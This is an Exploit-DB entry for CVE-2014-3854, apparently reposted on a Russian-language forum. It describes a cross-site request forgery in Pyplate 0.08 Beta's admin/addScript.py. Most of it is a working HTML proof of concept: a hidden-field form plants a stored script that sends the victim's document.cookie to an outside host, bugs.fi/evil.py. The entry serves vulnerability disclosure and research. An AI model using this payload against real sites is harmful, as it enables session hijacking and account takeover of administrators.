- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39199
- Проверка EDB
-
- Пройдено
- Автор
- HENRI SALO
- Тип уязвимости
- WEBAPPS
- Платформа
- PYTHON
- CVE
- cve-2014-3854
- Дата публикации
- 2014-05-23
Pyplate - 'addScript.py' Cross-Site Request Forgery
HTML:
source: https://www.securityfocus.com/bid/67610/info
Pyplate is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
Pyplate 0.08 Beta is vulnerable; other versions may also be affected.
<html>
<body>
<form action="http://www.example.com/admin/addScript.py"; method="POST">
<input type="hidden" name="title"
value="<script>new Image().src="http://bugs.fi/evil.py?cookie=" encodeURI(document.cookie);</script>"
/>
<input type="hidden" name="file" value="bugs" />
<input type="hidden" name="category" value="/" />
<input type="hidden" name="post" value="<p>bugs</p> " />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="new" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
- Источник
- www.exploit-db.com